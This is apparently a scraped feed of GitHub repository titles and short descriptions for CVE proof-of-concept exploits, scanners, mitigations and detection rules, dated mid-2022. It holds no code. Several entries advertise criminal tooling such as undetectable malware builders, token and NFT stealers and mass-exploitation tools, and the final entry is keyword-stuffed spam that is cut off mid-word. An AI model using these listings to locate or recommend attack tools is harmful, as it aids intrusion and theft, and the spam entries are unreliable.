no description : TonightRanger/cve-2018-9995 create time: 2022-07-04T05:07:57Z

CVE-2022-24706 POC exploit : superzerosec/CVE-2022-24706 create time: 2022-07-04T02:06:27Z

The above investigation of the ES file browser security weakness allows us to see the issue in its entirety : Osuni-99/CVE-2019-6447 create time: 2022-07-03T05:57:14Z

PoC for CVE-2022-24342: account takeover via CSRF in GitHub authentication : yuriisanin/CVE-2022-24342 create time: 2022-07-02T22:04:29Z

Ruby反序列化命令执行漏洞(CVE-2019-5420)-vulfocus通关版 : laffray/ruby-RCE-CVE-2019-5420- create time: 2022-07-02T15:44:03Z

no description : macilin/CVE-2021-21300 create time: 2022-07-02T12:19:21Z

CVE-2022-2185 poc : safe3s/CVE-2022-2185-poc create time: 2022-07-02T07:58:01Z

Proof-of-concept for CVE-2022-26766 on macOS 12.3.1 : zhuowei/CoreTrustDemo create time: 2022-07-02T06:16:33Z

PCIDriverKit proof-of-concept for CVE-2022-26763 : zhuowei/PCICrash create time: 2022-07-02T06:15:29Z

PoC for exploiting CVE-2022-1388 on BIG IP F5 : Luchoane/CVE-2022-1388_refresh create time: 2022-07-01T18:08:50Z

no description : Davi-afk/jenkins-cve-CVE-2017-2606 create time: 2022-07-01T15:43:26Z

CVE-2018-6574: go get RCE PentesterLab : Logan-Elliott/CVE-2018-6574-go-get-RCE create time: 2022-07-01T14:41:47Z

ASUS router exploit : Expl0desploit/CVE-2021-44158 create time: 2022-07-01T14:54:42Z

no description : Satheesh575555/external_aac_AOSP10_r33_CVE-2022-20130 create time: 2022-07-01T13:16:14Z

Apache Tomcat DoS (CVE-2022-29885) Exploit : iveresk/CVE-2022-29885 create time: 2022-07-01T09:02:10Z

Features: -Include silent doc exploit -Several exploits, most are sendable via GMail -Compatible with every rat/keylogger/worm -Compatible with Windows XP - Windows 10 32/64 -FUD (DOC CHM) -Works with every MS Office from 2007 to 2016 (excluding Starter edition - there's no macro support) -Startup -base64 encode : notSMods/Hta-Exploit-Downloader-Malware-Builder create time: 2022-06-30T19:56:40Z

no description : notSMods/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft create time: 2022-06-30T20:06:10Z

no description : notSMods/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022 create time: 2022-06-30T19:57:00Z

no description : notSMods/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022 create time: 2022-06-30T19:56:11Z

no description : Asbatel/CBDS_CVE-2022-0847_POC create time: 2022-06-30T13:07:55Z

Apache Tomcat DoS (CVE-2022-29885) Exploit : 4ra1n/CVE-2022-29885 create time: 2022-04-30T02:30:00Z

Navigate CMS <= 2.9.4 - Server-Side Request Forgery (Authenticated) : cheshireca7/CVE-2022-28117 create time: 2022-04-06T13:27:48Z

no description : vesperp/CVE-2021-42237-SiteCore-XP create time: 2022-06-30T10:44:23Z

GitLab-Graphql-CVE-2020-26413 POC : Kento-Sec/GitLab-Graphql-CVE-2020-26413 create time: 2022-06-30T06:29:28Z

GitLab Graphql邮箱信息泄露漏洞 CVE-2020-26413 POC : Kento-Sec/GitLab-Graphql-CVE-2020-26413 create time: 2022-06-30T06:28:27Z

0.6.18 - 1.20.0 Nginx Memory Overwrite Vulnerability PoC : M507/CVE-2021-23017-PoC create time: 2022-06-30T04:39:58Z

REST API for CVE from years '99-2022 : Vicariss/cve-rest create time: 2022-06-23T17:23:10Z

PoC for exploiting CVE-2022-26134 on Confluence : Luchoane/CVE-2022-26134_conFLU create time: 2022-06-29T17:33:18Z

CVE-2019-9729. Transferred from https://github.com/DoubleLabyrinth/SdoKeyCrypt-sys-local-privilege-elevation : huangyutange0uywlcn/HyperSine create time: 2022-06-29T15:33:05Z

PoC for ManageEngine ADAudit Plus CVE-2022-28219 : horizon3ai/CVE-2022-28219 create time: 2022-06-26T15:48:27Z

CVE-2021-34473 Microsoft Exchange Server Remote Code Execution Vulnerability : kh4sh3i/ProxyShell create time: 2022-06-29T12:37:31Z

A collection of exploits and documentation that can be used to exploit the Linux Dirty Pipe vulnerability. : flux10n/CVE-2022-0847-DirtyPipe-Exploits create time: 2022-06-29T12:02:13Z

CVE-2022-30190 powerpoint version : Gra3s/CVE-2022-30190-Follina-PowerPoint-Version create time: 2022-06-29T08:48:12Z

$$$$$$$$$$$$$$$ : Vbedtt54e5/interesting-release-of-CVE-2022-63432 create time: 2022-06-29T08:28:18Z

no description : trhacknon/CVE-2021-25003 create time: 2022-06-29T06:51:36Z

[CVE-2022-22980] Spring Data MongoDB SpEL Expression injection : murataydemir/CVE-2022-22980 create time: 2022-06-28T21:42:35Z

Apache Shiro CVE-2022-32532 : 4ra1n/CVE-2022-32532 create time: 2022-06-28T22:38:30Z

🕵️ CVE-2019-9670 Exploit | XXE in Zimbra Collaboration 8.7.X < 8.7.11p10 : oppsec/arbimz create time: 2022-06-28T20:01:11Z

no description : FedericoHeichou/CVE-2022-32988 create time: 2022-06-05T17:56:29Z

Old exploit for Issue 1076708 : kiks7/CVE-2020-6468-Chrome-Exploit create time: 2022-06-28T16:58:51Z

no description : NBAquicknut/CVE-2018-6574 create time: 2022-06-28T16:36:05Z

Dirty Cow exploit - CVE-2016-5195 : flux10n/dirtycow create time: 2022-06-28T10:08:43Z

工控安全,溯源 : Kvi74/CVE-2022-8475 create time: 2022-06-28T09:00:55Z

红队,蓝队,免杀 : Kvi74/CVE-2022-5561 create time: 2022-06-28T09:00:26Z

ARMember < 3.4.8 - Unauthenticated Admin Account Takeover : biulove0x/CVE-2022-1903 create time: 2022-06-28T08:39:12Z

攻击,免杀 : huihuo123/CVE-2022-5555 create time: 2022-06-28T07:42:17Z

An exploitable pool corruption vulnerability exists in the 0x8200E804 IOCTL handler functionality of WIBU-SYSTEMS WibuKey.sys Version 6.40 (Build 2400). A specially crafted IRP request can cause a buffer overflow, resulting in kernel memory corruption and, potentially, privilege escalation. An attacker can send an IRP request to trigger this vulnerability. : Exploitables/CVE-2018-3990-TALOS-2018-0658 create time: 2022-06-28T03:48:09Z

A docker container vulnerable to Shellshock - CVE-2014-6271 : anujbhan/shellshock-victim-host create time: 2022-06-27T21:52:28Z

Test CVE-2018-6574 : Bernasv/CVE-2018-6574 create time: 2022-06-27T21:21:49Z

免杀,攻击,钓鱼,蓝队,木马 : huihuo123/CVE2022-0111- create time: 2022-06-27T15:39:52Z

免杀,木马,攻击,防守 : huihuo123/CVE20222- create time: 2022-06-27T15:19:20Z

no description : huihuo123/cve2022-0001- create time: 2022-06-27T14:46:20Z

ProxyLogon (CVE-2021-26855+CVE-2021-27065) Exchange Server RCE (SSRF->GetWebShell) : kh4sh3i/ProxyLogon create time: 2022-06-27T08:07:48Z

CVE-2022-30136 Unauthenticated RCE in Microsoft Windows Network File System : oturu/CVE-2022-30136-POC create time: 2022-06-26T20:54:02Z

Python exploit for CVE-2021-38314 : c0ff33b34n/CVE-2021-38314 create time: 2022-06-26T17:23:40Z

WPCargo < 6.9.0 - Unauthenticated RCE : biulove0x/CVE-2021-25003 create time: 2022-06-26T13:07:47Z

no description : Viniciuspxf/CVE-2019-10742 create time: 2022-06-26T01:14:56Z

Active Directory scanner for MS17-010 MS14-068 CVE-2020-1472 etc... : hadhub/ad-scanner create time: 2022-06-25T23:12:10Z

Educational Follina PoC Tool : ethicalblue/Follina-CVE-2022-30190-PoC-sample create time: 2022-06-25T16:27:59Z

Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551. : tijme/kernel-mii create time: 2022-06-25T11:13:45Z

CVE-2022-30136 Unauthenticated RCE in Microsoft Windows Network File System : oturu/Cve-2022-30136-RCE create time: 2022-06-25T07:28:34Z

WaterDragon:用GithubAction实现代理功能。红队,cve,代理池,隐匿,攻防,对抗,hackone,src,proxy,CVE-2020,CVE-2021,CVE-2022 : sh3d0ww01f/WaterDragon create time: 2022-06-20T15:38:53Z

no description : zeroc00I/CVE-2022-34305 create time: 2022-06-25T05:49:55Z

Nacos下Spring-Cloud-Gateway CVE-2022-22947利用 : B0rn2d/Spring-Cloud-Gateway-Nacos create time: 2022-06-25T05:02:06Z

CVE-2021-26855 : TheDudeD6/ExchangeSmash create time: 2022-06-24T17:42:28Z

no description : cyb3rpeace/CVE-2021-34527 create time: 2022-06-24T13:25:25Z

CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit) : arvindshima/CVE-2021-3156 create time: 2022-06-24T11:50:40Z

Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134) : ColdFusionX/CVE-2022-26134 create time: 2022-06-24T10:33:13Z

CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit) : arvindshima/CVE-2021-3156 create time: 2022-06-24T09:01:39Z

Cisco ASA XSS CVE-2020-3580 : cruxN3T/CVE-2020-3580 create time: 2022-06-24T02:16:05Z

Mass-Exploit-CVE-2022-1388 : electr0lulz/Mass-CVE-2022-1388 create time: 2022-06-24T00:58:37Z

Tested in HackTheBox - Shocker (Easy) CVE-2014-6271 : Gurguii/shellshock.sh create time: 2022-06-23T19:42:03Z

Admin account registration in Online Student Rate System : StefanDorresteijn/CVE-2021-39409 create time: 2021-08-17T16:48:53Z

XSS vulnerability in Online Student Rate System1.0 : StefanDorresteijn/CVE-2021-39408 create time: 2021-08-17T16:45:06Z

no description : PenteraIO/CVE-2022-23222-POC create time: 2022-06-22T14:01:50Z

Exploit for zerologon cve-2020-1472 : lele8/CVE-2020-1472 create time: 2022-06-23T07:18:17Z

Mass Exploit for CVE 2022-29464 on Carbon : electr0lulz/Mass-exploit-CVE-2022-29464 create time: 2022-06-22T20:58:33Z

CVE-2022-9673 : CVE-2099-2222/CVE-2022-9673 create time: 2022-06-22T10:09:42Z

CVE-2022-22980 漏洞靶场(扫描器可使用) : jweny/cve-2022-22980-exp create time: 2022-06-22T07:51:22Z

CVE-2022-22980环境 : li8u99/Spring-Data-Mongodb-Demo create time: 2022-06-22T07:39:42Z

IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting : trhacknon/CVE-2020-8512 create time: 2022-06-22T07:10:53Z

Spring Data MongoDB SpEL表达式注入漏洞(CVE-2022-22980) Demo环境 : li8u99/Spring-Data-Mongodb-Demo create time: 2022-06-22T06:27:43Z

(1) IQVW32.sys before 1.3.1.0 and (2) IQVW64.sys before 1.3.1.0 in the Intel Ethernet diagnostics driver for Windows allows local users to cause a denial of service or possibly execute arbitrary code with kernel privileges via a crafted (a) 0x80862013, (b) 0x8086200B, (c) 0x8086200F, or (d) 0x80862007 IOCTL call. : Exploitables/CVE-2015-2291 create time: 2022-06-22T05:22:57Z

no description : trhacknon/CVE-2020-17519 create time: 2022-06-22T03:53:52Z

CVE-2022-111111测试 : thelostworldFree/CVE-2022-111111 create time: 2022-06-21T13:35:55Z

CVE-2022-22980环境 : kuron3k0/Spring-Data-Mongodb-Example create time: 2022-06-21T12:02:00Z

[PoC] Atlassian Confluence (CVE-2022-26134) - Unauthenticated OGNL injection vulnerability (RCE) : kh4sh3i/CVE-2022-26134 create time: 2022-06-21T11:49:48Z

Poc of CVE-2022-22980 : trganda/CVE-2022-22980 create time: 2022-06-21T11:39:13Z

no description : delicateByte/CVE-2019-19945_Test create time: 2022-06-21T09:07:10Z

cve-2021-22005vcenter任意文件上传漏洞,可直接上传冰蝎 : InventorMAO/cve-2021-22005 create time: 2022-06-21T07:36:01Z

Windows Network File System Crash PoC : i6c/CVE-2022-26937 create time: 2022-06-21T00:12:32Z

[CVE-2018-4084] : dybrkr/wifi_leak create time: 2022-06-20T21:10:22Z

Telesquare SDT-CW3B1 1.1.0 - OS Command Injection : Chocapikk/CVE-2021-46422 create time: 2022-06-20T19:24:55Z

Golang implementation of CVE-2019-17662 TinyVNC Arbitrary File Read leading to Authentication Bypass Exploit : Tamagaft/CVE-2019-17662 create time: 2022-06-19T16:33:04Z

CVE-2022-1388 | F5 - Big IP Pre Auth RCE via '/mgmt/tm/util/bash' endpoint : Chocapikk/CVE-2022-1388 create time: 2022-06-20T01:58:40Z

burpsuite 的Spring漏洞扫描插件。SpringVulScan:支持检测:路由泄露|CVE-2022-22965|CVE-2022-22963|CVE-2022-22947|CVE-2016-4977 : tpt11fb/SpringVulScan create time: 2022-06-19T13:16:55Z

「💥」CVE-2022-26134 - Confluence Pre-Auth RCE : AmoloHT/CVE-2022-26134 create time: 2022-06-19T13:50:22Z

CVE-2022-30136 Unauthenticated RCE in Microsoft Windows Network File System : zir0x00/CVE-2022-30136-MASS-RCE create time: 2022-06-19T12:13:41Z

MSDT 0-Day Mass Exploitation Tool : zir0x00/CVE-2022-30190-MASS-RCE create time: 2022-06-19T12:10:10Z

CVE-2021-40903 : vulnz/CVE-2021-40903 create time: 2022-06-19T09:01:24Z

no description : PyterSmithDarkGhost/0DAYIPHONE13IOS15.2CVE-2022-22588 create time: 2022-06-19T04:24:54Z

no description : wlensinas/CVE-2002-1614 create time: 2022-06-18T18:43:35Z

no description : PyterSmithDarkGhost/CVE-2022-21661-WordPress-Core-5.8.2-WP_Query-SQL-Injection-main create time: 2022-06-18T14:42:04Z

PoC for CVE-2022-26809, analisys and considerations are shown in the github.io. : s1ckb017/PoC-CVE-2022-26809 create time: 2022-06-13T11:08:33Z

Research project which I have started working on during my internship conducted at LIF, between April and June 2022. Our goal is to establish a machine learning model, which can predict efficiently if a CVE will be exploited in the wild or not. : rayan776/LIF_predict_cve_exploited create time: 2022-06-18T08:59:05Z

no description : xCodeBossS/CodeBoss-CVE-2022 create time: 2022-06-18T01:53:37Z

metasploit module for CVE-2022-26809 windows rpc rce via smb 445 : Ziggy78/CVE-2022-26809-POC create time: 2022-06-17T20:47:07Z

no description : InitRoot/CVE-2022-23342 create time: 2022-06-17T19:46:45Z

CVE-2021-43229 Walkthrough : Citizen13X/CVE-2021-43229 create time: 2022-06-07T13:32:17Z

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013. : pwn3z/CVE-2021-41773-Apache-RCE create time: 2022-06-17T13:36:42Z

unauthorized RcE exploit for webnin < 1.920 : psw01/CVE-2019-15107_webminRCE create time: 2022-06-17T12:04:38Z

Integer overflow in KmxSbx.sys 6.2.0.22 in CA Internet Security Suite Plus 2010 allows local users to cause a denial of service (pool corruption) and execute arbitrary code via crafted arguments to the 0x88000080 IOCTL, which triggers a buffer overflow. : Exploitables/CVE-2010-4502 create time: 2022-06-17T02:39:13Z

Windows Network File System Crash PoC : omair2084/CVE-2022-26937 create time: 2022-06-17T01:42:55Z

URL Infection (Silent Java Drive By) URL Infection Exploit Silent Java Drive by downloads may happen when visiting a site, opening an e-mail message. It may even happen by clicking on a malicious pop-up window: by clicking on the window in the belief that it concerns an error report from the computer’s OS, for example. : Dexie619/Slient-Url-Exploit-New-Cve-Chrome-Exploit-Html-Downloader-Put-Your-Link create time: 2022-06-16T19:45:02Z

CVE-2022-30136 Unauthenticated RCE in Microsoft Windows Network File System : oturu/Cve-2022-30136-RCE create time: 2022-06-16T21:16:53Z

no description : 34dsfsdf4/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft create time: 2022-06-16T19:52:25Z

no description : 34dsfsdf4/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022 create time: 2022-06-16T19:43:58Z

no description : 34dsfsdf4/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022 create time: 2022-06-16T19:43:00Z

CVE-2022-26757 discovered by @nedwill : Dylbin/flow_divert create time: 2022-06-16T14:58:25Z

关于漂亮鼠的那些精彩事迹(变态的油腻大叔)CVE-2022-6969、CVE-2022-0001 : piaoliangshu/piaoliangshusb create time: 2022-06-16T11:58:36Z

A Insecure direct object references (IDOR) vulnerability in "Simple 2FA Plugin for Moodle" by LMS Doctor : FlaviuPopescu/CVE-2022-28986 create time: 2022-06-16T08:52:28Z

RCE from phpunit 5.6.2 : Invertebr4do/cve-2017-9841 create time: 2022-06-16T06:22:03Z

no description : 0xF331-D3AD/CVE-2012-2982 create time: 2022-06-16T01:59:28Z

follina zero day vulnerability to help Microsoft to mitigate the attack : Cerebrovinny/follina-CVE-2022-30190 create time: 2022-06-15T22:49:21Z

Reflected XSS on /link.cgi/ in Latest Webmin (1.994) : bl4ckmenace/CVE-2022-30709 create time: 2022-06-15T17:46:38Z

no description : Haniwa0x01/CVE-2022-30023 create time: 2022-06-15T16:10:49Z

IOC List : bengisugun/CVE-2022-22972- create time: 2022-06-15T12:34:20Z

no description : Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20004 create time: 2022-06-15T10:29:03Z

These are the source codes of the Python scripts to apply the temporary protection against the CVE-2022-30190 vulnerability (Follina) : SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code create time: 2022-06-12T11:48:22Z

These are two Python scripts compiled to easily and quickly apply temporary protection against the CVE-2022-30190 vulnerability (Follina) : SrCroqueta/CVE-2022-30190_Temporary_Fix create time: 2022-06-11T11:16:56Z

no description : notherealhazard/follina-CVE-2022-30190 create time: 2022-06-15T09:13:05Z

some work for exploits cve-2020-2555\2883\14645 to attack ,draw lessons from Weblogic_cmd : minhangxiaohui/Weblogic_Coherence_exploit create time: 2022-06-15T08:28:52Z

This repository is developed to understand CVE-2019-6447 : VinuKalana/CVE-2019-6447-Android-Vulnerability-in-ES-File-Explorer create time: 2022-06-15T05:32:34Z

no description : p4tq/hikvision_CVE-2017-7921_auth_bypass_config_decryptor create time: 2022-06-15T03:49:05Z

Extract payload URLs from Follina (CVE-2022-30190) docx and rtf files : MalwareTech/FollinaExtractor create time: 2022-06-15T02:22:53Z

CVE-2022-22620: Use-after-free in Safari : kmeps4/CVE-2022-22620 create time: 2022-06-14T22:08:14Z

no description : ahaShiyu/CVE-2018-15856 create time: 2022-06-14T19:32:35Z

no description : ahaShiyu/CVE-2018-18839 create time: 2022-06-14T19:21:37Z

no description : ahaShiyu/CVE-2018-19854 create time: 2022-06-14T19:11:55Z

no description : ahaShiyu/CVE-2018-20175 create time: 2022-06-14T19:07:33Z

no description : ahaShiyu/CVE-2019-3560 create time: 2022-06-14T18:47:10Z

no description : ahaShiyu/CVE-2019-12874 create time: 2022-06-14T15:10:15Z

no description : ahaShiyu/CVE-2019-1010319 create time: 2022-06-14T14:42:12Z

WebLogic CNVD-C-2019_48814 CVE-2017-10271 Scan By 7kbstorm : KKsdall/7kbstormq create time: 2022-06-14T12:55:53Z

writeup and poc for [CVE-2022-26809] CVE-2022-26809 Vulnerabillity in cre windows componen(RPC) with a high cvss score of 9.8 : scoobydoobi/CVE-2022-26809-POC-RCE create time: 2022-06-14T12:53:36Z

no description : ernestak/Sigma-Rule-for-CVE-2022-30190 create time: 2022-06-14T09:27:37Z

I wrote a blog post about Apache CouchDB CVE-2022-24706 RCE Exploits : ahmetsabrimert/Apache-CouchDB-CVE-2022-24706-RCE-Exploits-Blog-post- create time: 2022-06-14T08:34:11Z

no description : ernestak/CVE-2022-30190 create time: 2022-06-14T08:29:40Z

no description : l00neyhacker/CVE-2021-40650 create time: 2022-06-13T23:43:19Z

no description : l00neyhacker/CVE-2021-40649 create time: 2022-06-13T23:33:20Z

CVE-2022-26134 - Pre-Auth Remote Code Execution via OGNL Injection : Chocapikk/CVE-2022-26134 create time: 2022-06-13T23:01:39Z

Python file scanner created in 2021 scanning for known and potential vulns : XxToxicScriptxX/CVE-2022-30190 create time: 2022-06-13T21:32:45Z

A python based exploit for CVE-2022-30525 : ProngedFork/CVE-2022-30525 create time: 2022-06-13T21:11:54Z

Haraj Script 3.7 - Post Ads Authenticated Stored XSS : bigzooooz/CVE-2022-31301 create time: 2022-06-13T19:47:04Z

Haraj Script 3.7 - DM Section Authenticated Stored XSS : bigzooooz/CVE-2022-31300 create time: 2022-06-13T19:42:37Z

Haraj Script 3.7 - Reflected XSS : bigzooooz/CVE-2022-31299 create time: 2022-06-13T19:32:23Z

Haraj Script 3.7 - Authenticated Stored XSS : bigzooooz/CVE-2022-31298 create time: 2022-06-13T19:30:12Z

Haraj Script 3.7 - Reflected XSS : bigzooooz/CVE-2022-31297 create time: 2022-06-13T19:25:41Z

Online Discussion Forum Site 1.0 - Blind SQL Injection : bigzooooz/CVE-2022-31296 create time: 2022-06-13T19:21:04Z

no description : bigzooooz/CVE-2022-31295 create time: 2022-06-13T19:16:13Z

no description : bigzooooz/CVE-2022-31294 create time: 2022-06-13T19:03:04Z

no description : randorisec/CVE-2022-1972-infoleak-PoC create time: 2022-06-10T13:15:20Z

dvb-2022-MaksimsCvetkovs created by GitHub Classroom : MaksimsCvetkovs/2022-DP3-3-MaksimsCvetkovs create time: 2022-05-15T08:02:39Z

To determine if an APK is vulnerable to CVE-2017-13156 : M507/CVE-2017-13156 create time: 2022-06-10T23:32:29Z

Safenet Authentication Client Privilege Escalation - CVE-2021-42056 : z00z00z00/Safenet_SAC_CVE-2021-42056 create time: 2021-11-18T14:27:06Z

Missing Authentication on Critical component CVE-2021-38540 : Captain-v-hook/PoC-for-CVE-2021-38540- create time: 2022-06-13T11:43:26Z

4.9 Kernel Exploit for CVE-2020-27786 : kiks7/CVE-2020-27786-Kernel-Exploit create time: 2022-06-13T08:04:19Z

An Unofficial Patch Follina CVE-2022-30190 (patch) by micrisoft Guidelines. for more details goto : https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ : SonicWave21/Follina-CVE-2022-30190-Unofficial-patch- create time: 2022-06-13T04:20:02Z

no description : trhacknon/CVE-2021-3156 create time: 2022-06-13T02:40:36Z

CVE-2022-26134 - Confluence Pre-Auth Remote Code Execution via OGNL Injection : Chocapikk/CVE-2022-26134 create time: 2022-06-12T22:40:15Z

I'm trying : 1SeaMy/CVE-2022-22954 create time: 2022-06-12T21:41:38Z

no description : trhacknon/CVE-2022-26134-bis create time: 2022-06-12T21:26:17Z

no description : trhacknon/CVE-2022-26134 create time: 2022-06-12T20:24:36Z

no description : ahmetfurkans/CVE-2022-22718 create time: 2022-06-12T20:18:00Z

no description : seymanurmutlu/CVE-2022-24086-CVE-2022-24087 create time: 2022-06-12T19:54:16Z

CVE 2022-21449 : fundaergn/CVE-2022-21449 create time: 2022-06-12T19:41:48Z

A OS Command Injection Vulnerability in the CGI Program of Zyxel : furkanzengin/CVE-2022-30525 create time: 2022-06-12T19:04:41Z

Python3 code to CVE-2019-15107 and CVE-2019-15231 : NullBrunk/WebminExploit create time: 2022-06-12T15:31:38Z

Practicing technical writing with researching CVE-2022-22954 VMware Workspace ONE Access RCE vulnerability. : arzuozkan/CVE-2022-22954 create time: 2022-06-11T14:39:57Z

no description : mel1huc4r/CVE-2022-31983 create time: 2022-06-12T14:59:01Z

no description : heavenswill/CVE-2022-32013 create time: 2022-06-12T13:15:58Z

Log4Shell CVE-2021-44228 Demo : ra890927/Log4Shell-CVE-2121-44228-Demo create time: 2022-06-12T10:57:07Z

Axios Redos (CVE-2021-3749) proof of concept : T-Guerrero/axios-redos create time: 2022-06-12T03:06:45Z

CVE-2022-24806 and CVE-2022-24807 are an unauthenticated RCE vulnerability in magento and adobe commerce : oturu/CVE-2022-24806-MASS-RCE create time: 2022-06-11T18:59:00Z

CVE-2021-35576 : emad-almousa/CVE-2021-35576 create time: 2022-06-11T17:36:01Z

proof of concept to CVE-2022-30190 (follina) : AmitNiz/follina_cve_2022-30190 create time: 2022-06-10T14:57:17Z

writeup and poc for [CVE-2022-26809] : scoobydoobi/CVE-2022-26809-RCE create time: 2022-06-11T13:22:45Z

CVE-2022-30190 : CVE 0-day MS Offic RCE aka msdt follina : safakTamsesCS/PicusSecurity4.Week.Repo create time: 2022-06-10T12:09:37Z

Exploit for CVE-2017-12561: dbman Opcode 10012 Use-After-Free Remote Code Execution : whokilleddb/CVE-2017-12561-Exploit create time: 2022-06-11T11:00:42Z

no description : trhacknon/CVE-2022-30075 create time: 2022-06-11T07:04:55Z

[CVE-2022-26134] Attlasian Confluence RCE : KeepWannabe/BotCon create time: 2022-06-10T18:07:16Z

this is my simple article about CVE 2022-30190 (Follina) analysis. I use the lab from Letsdefend. : Abdibimantara/CVE-2022-30190-Analysis-With-LetsDefends-Lab create time: 2022-06-10T16:29:07Z

no description : Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20004 create time: 2022-06-10T12:23:08Z

no description : Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20005 create time: 2022-06-10T11:56:59Z

no description : google-mirror/CVE-2022-1966 create time: 2022-06-10T11:34:25Z

NEW EXPLOIT FOR TP LINK : SAJIDAMINE/CVE-2022-30075 create time: 2022-06-10T11:09:30Z

[CVE-2022-26134] Confluence Pre-Auth Object-Graph Navigation Language (OGNL) Injection : murataydemir/CVE-2022-26134 create time: 2022-06-10T09:52:22Z

no description : warmachine-57/CVE-2021-44582 create time: 2022-06-10T08:32:28Z

CVE-2022-26134, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This is CVE-2022-26134 expoitation script : sunny-kathuria/exploit_CVE-2022-26134 create time: 2022-06-10T08:57:30Z

PoC for Sourcegraph Gitserver < 3.37.0 RCE : Altelus1/CVE-2022-23642 create time: 2022-06-10T06:12:15Z

CVE-2018-17240 : BBge/CVE-2018-17240 create time: 2022-06-10T04:34:17Z

no description : Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20007 create time: 2022-06-10T04:26:02Z

hello : buff07/CVE-2022-31403 create time: 2022-06-10T03:25:56Z

CVE-2022-31402 : YavuzSahbaz/CVE-2022-31402 create time: 2022-06-10T03:23:58Z

check CVE-2021-40438 : gassara-kys/CVE-2021-40438 create time: 2022-06-10T00:46:58Z

Mitigation for CVE-2022-30190 : k508/CVE-2022-30190 create time: 2022-06-10T00:23:11Z

no description : 34dsfsdf4/Nft-Grabber-Stealer-Exploit-Cve-2022-Steal-BlockHain-Hack-Nft create time: 2022-06-09T21:38:51Z

no description : 34dsfsdf4/Jpg-Png-Exploit-Downloader-Fud-Cryter-Malware-Builder-Cve-2022 create time: 2022-06-09T21:31:49Z

no description : 34dsfsdf4/Discord-Image-Token-Password-Grabber-Exploit-Cve-2022 create time: 2022-06-09T21:30:54Z

no description : Trhackno/CVE-2022-23808 create time: 2022-06-09T17:34:46Z

Python exploit for CVE-2011-2523 (VSFTPD 2.3.4 Backdoor Command Execution) : 0xSojalSec/-CVE-2011-2523 create time: 2022-06-09T16:25:25Z

Bash poc for CVE-2022-1609 WordPress Weblizar Backdoor : 0xSojalSec/-CVE-2022-1609 create time: 2022-06-09T14:36:55Z

no description : SamuelGaudemer/POC_CVE-2020-11898 create time: 2022-06-09T13:42:01Z

Information and Scripts to remediate and restore functionality for CVE 2022 30190 : ToddMaxey/CVE-2022-30190 create time: 2022-06-09T13:19:23Z

no description : Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20007 create time: 2022-06-09T11:13:18Z

Repository containing the compromised certificate seen in recent CVE-2022-30190 (Follina) attacks. : b401/Clickstudio-compromised-certificate create time: 2022-06-09T10:03:06Z

Exploit Microsoft Zero-Day Vulnerability Follina (CVE-2022-30190) : Hrishikesh7665/Follina_Exploiter_CLI create time: 2022-06-09T09:32:10Z

CVE-2022-26134 : cai-niao98/CVE-2022-26134 create time: 2022-06-09T02:11:58Z

Exploit modificado para el tito Eu : CronoX1/CVE-2021-4034 create time: 2022-06-08T20:00:39Z

writeup and poc for cve-2022-26809 : scoobydoobi/CVE-2022-26809-RCE-POC create time: 2022-06-08T17:22:21Z

# CVE-2019-1205 Silent Exploit a28tEav a28tEav a28tEav 2022 Silent DOC Exploit CVE 2019-1205 YouTube Tutorial : https://youtu.be/eWhwFEyWnak These videos were not taken for illegal activities. Do not use the product for illegal activities! When using this product it serves to encrypt and protect your files. In this way, access to the source code cannot be provided. It can never be abused! It is a software used to encrypt your files safely. It cannot be used maliciously! Otherwise, we do not accept full responsibility for this. It is not an illegal Crypter service. All the software tested belongs to us I never test with remote administration tools and certainly do not recommend such a thing to people as the producer of the program. It is a software produced to protect the data of your own clean project from malicious people. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2019-1205 # Tags silent exploit, silent exploit pdf, silent exploit doc, silent exploit jpg, silent exploit builder, silent exploit android jpg, silent exploit builder cracked, the silent comedy exploitation, silent pdf exploit builder python, fresh silent doc exploit, daily exploits silent aim, silent aim hack, silent aim cheat, silent aim hack bgmi, hack silent aim blox fruit, silent hack bgmi, silent hack bgmi 1.8, silent hack cartoon, silent castle cheat, silent castle hack, silent cartographer glitch, silent doc exploit, silent exploit electra, silent exploit error, silent exploit electra 11.3.1, silent exploit explained, silent exploit ep 1, silent exploit free, silent exploit free download, silent exploit failed, silent exploit for roblox, silent exploit fortnite, silent exploit fallout 76, silent hack game, silent glitch hunter call of the wild, silent hill hack, cheat silent hill origins ppsspp, silent hill glitch, silent exploit in a sentence, silent exploit in guards, silent exploit in spanish, silent exploit in roblox, silent exploit in ragdoll engine, silent jpg exploit, silent exploit kit, silent exploit kit detection, silent exploit krunk, silent lighter hack, silent microwave hack, silent exploit netcore router backdoor access, silent exploit no more, silent exploit no virus, silent exploit news, silent exploit nyc, silent exploit on roblox, silent exploit oil painting was, silent exploit on mobile, silent exploit on mac, silent hack pubg, silent hack pubg 1.8, silent cheat pubg, silent hack pubg mobile, silent pdf exploit, silent exploit quest, silent exploit quest 2, silent hack real, hack silent samp, silent treatment hack, silent 